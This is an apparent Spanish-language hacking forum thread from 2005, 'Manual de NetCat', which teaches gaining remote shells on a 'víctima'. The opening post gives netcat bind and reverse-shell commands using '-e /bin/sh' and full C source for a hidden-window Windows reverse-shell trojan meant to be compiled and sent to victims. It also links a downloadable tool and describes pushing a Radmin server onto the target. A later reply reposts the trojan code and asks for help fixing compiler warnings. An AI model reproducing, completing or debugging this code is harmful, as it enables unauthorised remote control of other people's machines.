Manual de NetCat

Iniciado por Kasswed, 19 Septiembre 2005, 14:20 PM

0 Miembros y 1 Visitante están viendo este tema.

Kasswed


Wiki, me animé a hacer el manual, espero que os guste y que me déis consejos a mejorarlo o a quitarle fallos que seguro que hay.

Introducción:



Como muchos sabréis NetCat se ha venido haciendo más famoso cada día. Esta
fantástica herramienta que nos permite hacer muchísimas cosas... Desde
montar un chat, hasta enviar ficheros o averiguar datos sonbre un web, por
ello NetCat (ó NC) se ha ido convirtiendo tan famoso.

En este manual no voy a explicar cómo hacer un chat, ni ninguna de sus
ualidades, lo que voy a intentar explicar es cómo conseguir una shell (una
consola, una terminal, un programa de comandos etc) haciendo uso de él.

Preparándose

Pues bien, lógicamente lo primero que necesitamos es NetCat. Lo podéis
encontrar en google, por inet. Buscad bien, sino en nuestra web está subido,
en la parte de Herramientas.

De momento sólo necesitamos eso, cuando vayan surgiendo más cosas os las iré
explicando.

Por cierto, también ncesitamos una shell, tanto de windows como de Linuc o
del SO que sea.

Los de Linux podéis encontrar NC en sourceforge por ejemplo, en cuanto a lo
usuarios de Windows, una vez que lo bajéis descomprimidlo en system32, para
hacer más fácil su manejo.

Víctima y atacante

Bueno, quería dejar una cosa clara antes de comenzar. Este texto lo he
escrito en mi máquina de windows, asi que el atacante será
192.168.1.33 con sun SO de windows, y la víctima será
192.168.1.34 con un SO de Linux. Dicho esto pasemos a la acción.

Obtener una shell directamente:

Una shell directa es bastante fácil de lograr, pero no es la más
recomendada, conforme vayáis leyendo os daréis cuenta de sus desventajas.

Para lograr una shell directa el equipo víctima tiene que ejecutar el
siguiente comando:


nc -l -e /bin/sh -p 6000

Os preguntaréis, y qué es todo eso? Pues os lo explico:

nc           Ahí invocamos al NetCat
-l            Para poner a la escucha un puerto
-e           Sirve para llamar a la ejecución de un programa.
/bin/sh   Es la shell de Linux, en windows sería cmd.exe
-p           Para indicar qué puerto queremos poner a la escucha

De tal manera que lo que hacemos en la víctima es poner a la escucha el
puerto 6000, sirviendo para alguna conexión remota el programa /bin/sh, que
es la shell de Linux. Si la víctima es un SO Windows, este progama sería
cmd.exe.

Una vez hecho eso en la víctima nos queda conectar con ella, con la máquina
atacante. Para ello simplemente indicamos IP y PUERTO:

nc -vv <IP> <PUERTO>

Donde:
-vv    Sirve para dar más datos, es decir, datos detallado de la
conexión.
<IP>  Aquí va la IP de la víctima.
<PUERTO> Aquí el Puerto de conexión.

En mi ejemplo el comando quedó de la siguiente manera:


nc -vv 192.168.1.34 6000

Y obtení una shell de mi máquina Linux, hice un dir y me devolvió los datos:



NOTA: En este ejemplo no aparece el clásico "c:\" porque la víctima es un
SO Linux, si fuera un Windows si aparecería.Otra cosa importante a decir es
que si tenemos un router o firewall, debéis abrir los puertos, sino nada
servirá.


Obtener una shell inversa:

Para mí, para mí... esta es la manera más eficaz de obtener una shell,
porque tú no te conectas a tu víctima, es ella quien se conecta a ti.
Veámoslo con un ejemplo:

En la máquina atacante pongo este comando:


nc -vv -l -p 6000

De manera que pongo a la escucha el puerto 6000.

En mi máquina víctima (Linux) pongo el siguiente comando:


nc -e /bin/sh 192.168.1.33 6000

Así creo que lo entendemos mejor. Es decir, la víctima sirve la shell y se
conecta al atacante. Esto tiene muchas ventajas, ya que si por ejemplo
tienes una víctima con IP Dinámica (la IP cambia cada X tiempo) no podrás
tenerla como víctima el tiempo que quieras, y cuando intentes conectar no
podrás porque su IP habrá cambiado. Pero si n cambio es ella la que se
conecta a ti, ahí estás ganando, porque tú puedes ponerte un dominio NO-IP
por ejemplo, y cada vez que te pongas a la escucha recibirás la shell.

De manera que comprobado con mis dos máquinas, funciona:



Hasta ahora os estaréis preguntando esto: ¿De qué sirve el NetCat si hay que
tener acceso físico a la PC? Pues no. No necesariamene hay que tener acceso
físico a la PC. Aquí os dejo un exploit para windows (para Linux no hay
virus, ni exploit ni nada :P [si lso hay pero no de NetCat]) con el que
podréis recibir una shell inversa:


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
int main(int argc, char *argv[])
{
        ShowWindow(GetForegroundWindow(),SW_HIDE);
        WSADATA wsaData;
        SOCKET hSocket;
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        struct sockaddr_in addr;
        memset(&addr,0,sizeof(addr));
        memset(&si,0,sizeof(si));
        WSAStartup(MAKEWORD(2,0),&wsaData);
        hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
        addr.sin_family = AF_INET;
        addr.sin_port = htons(PUERTO); //Atencion a esta linea, aki va el
puerto de conexion NetCat
        addr.sin_addr.s_addr = inet_addr("AKI TU IP O DOMINIO
NO-IP");//Atencion a esta linea, aki va tu IP
        connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
        CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
        ExitProcess(0);
}


Esto es un código en C++, sólo debéis cambiarle un par de cosillas. Una vez
cambiadas lo único que tenéis que hacer es compilarlo y hacer un EXE, para
ello podéis usar DevC++ o vuestro compilador preferido. Enviáis este
ejecutable, y os ponéis a la escucha con el puerto que hayáis puesto, y
cuando tu víctima lo ejecuta ya tendrás una shell inversa.

También podeis programar un BAT, que descarga el NC y haga la conexión.
Además del BAT y del código en C hay muchas utilidades por ahí, por ejemplo,
esta:

http://venus.walagata.com/w/nc2k5/1401581.rar

Y buscando por google encontraréis más.

Enviar y recibir archivos con NetCat:

Para poder enviar y recibir archivos con NetCat (ojo, por NetCat, no por tFTP ni nada de eso) es necesario ejecutar comandos en ambas máquinas, apuntando al archivo que se quiera mandar, de la siguiente forma:

Suponiendo que el atacante quiere enviar un servidor Radmin a la víctima:


nc <IP> <PUERTO> < "Archivo"

Y para recibir:

nc -l -p <PUERTO> > "Archivo"

De tal manera que si quiero enviar: r_server.exe haré:

nc 192.168.1.34 6000 < "r_server.exe"

Y en la máquina víctima:


nc -l -p 6000 > "r_server.exe"

Nota: La transferencia de archivos por NetCat es muy básica y se aconseja no usarla, puede ser lenta y mala.

Otros métodos de transferencia de archivos:

Al ser la transferencia por NetCat "mala y lenta", podemos usar otros métodos de transferencia de archivos, una vez que hayamos conseguido shell.

Uno de ellos es el tFTP, del cual no voy a explicar nada porque no viene a cuento, pero podéis buscar manuales en google.

Otro método de transferencia es FTP, un cliente FTP lo tiene cualquier SO por defecto, sólo hay que conectarse al servidor FTP y de ahí descargar; igual que con tFTPpodéis buscar algún manual.



Bueno, ahí termina el manual de NetCat, espero que lo haya explicado todo bien, por lo menos lo he intentado, si queréis ahcerme alguna sugerencia sobre qué ponerle más o lo que sea, decídmelo ya! xD.


Saludos!
"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

pisagatos

is the polla el manual tio, voy aprender a utilizarlo mejor

Kasswed

Seguro que habrá fallos y cosas no bien explicadas así que decídmelo.

Saludos!
"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

c3r0x

#3
se


Kasswed

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

H@T

La verdad que te pasaste esta muy bueno, eso si quisiera saber mas utilidades del netcat ya que lo llaman la navaja suiza porque debe tener muchisimas utilidades....
H@T
http://www.redes-seguridad.com.ar
redes-seguridad.blogspot.com/

$$doctor$$

bastante bueno el manual felicitaciones!!

Kasswed

Thx thx jejejeje  ;D ;D ;D ;D

tirher busca por google, NetCat es una herrameinta muy buena, sólo hay que saber buscar.

Saludos!
"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

Kasswed

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.

trupin

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
int main(int argc, char *argv[])
{
        ShowWindow(GetForegroundWindow(),SW_HIDE);
        WSADATA wsaData;
        SOCKET hSocket;
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        struct sockaddr_in addr;
        memset(&addr,0,sizeof(addr));
        memset(&si,0,sizeof(si));
        WSAStartup(MAKEWORD(2,0),&wsaData);
        hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);         
addr.sin_family = AF_INET;
        addr.sin_port = htons(PUERTO); //Atencion a esta linea, aki va el
puerto de conexion NetCat
        addr.sin_addr.s_addr = inet_addr("AKI TU IP O DOMINIO
NO-IP");//Atencion a esta linea, aki va tu IP
        connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
        CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);        
ExitProcess(0);
}

hola me aperecen errores en las lineas en rojo, estoy ocupando el dev c++. yo se programar en c++ pero basico no lo domino a la perfeccion.
en la primera linea en rojo:

18 C:\Documents and Settings\Pancho\Escritorio\nc.cpp [Warning] passing NULL used for non-pointer converting 3 of `SOCKET WSASocketA(int, int, int, _WSAPROTOCOL_INFOA*, GROUP, DWORD)'
18 C:\Documents and Settings\Pancho\Escritorio\nc.cpp [Warning] passing NULL used for non-pointer converting 5 of `SOCKET WSASocketA(int, int, int, _WSAPROTOCOL_INFOA*, GROUP, DWORD)'
18 C:\Documents and Settings\Pancho\Escritorio\nc.cpp [Warning] passing NULL used for non-pointer converting 6 of `SOCKET WSASocketA(int, int, int, _WSAPROTOCOL_INFOA*, GROUP, DWORD)'

en la segunda linea en rojo:

26 C:\Documents and Settings\Pancho\Escritorio\nc.cpp [Warning] passing NULL used for non-pointer converting 6 of `BOOL CreateProcessA(const CHAR*, CHAR*, _SECURITY_ATTRIBUTES*, _SECURITY_ATTRIBUTES*, BOOL, DWORD, void*, const CHAR*, _STARTUPINFOA*, _PROCESS_INFORMATION*)'

si me pueden ayudar sera ideal
esop
grax chaus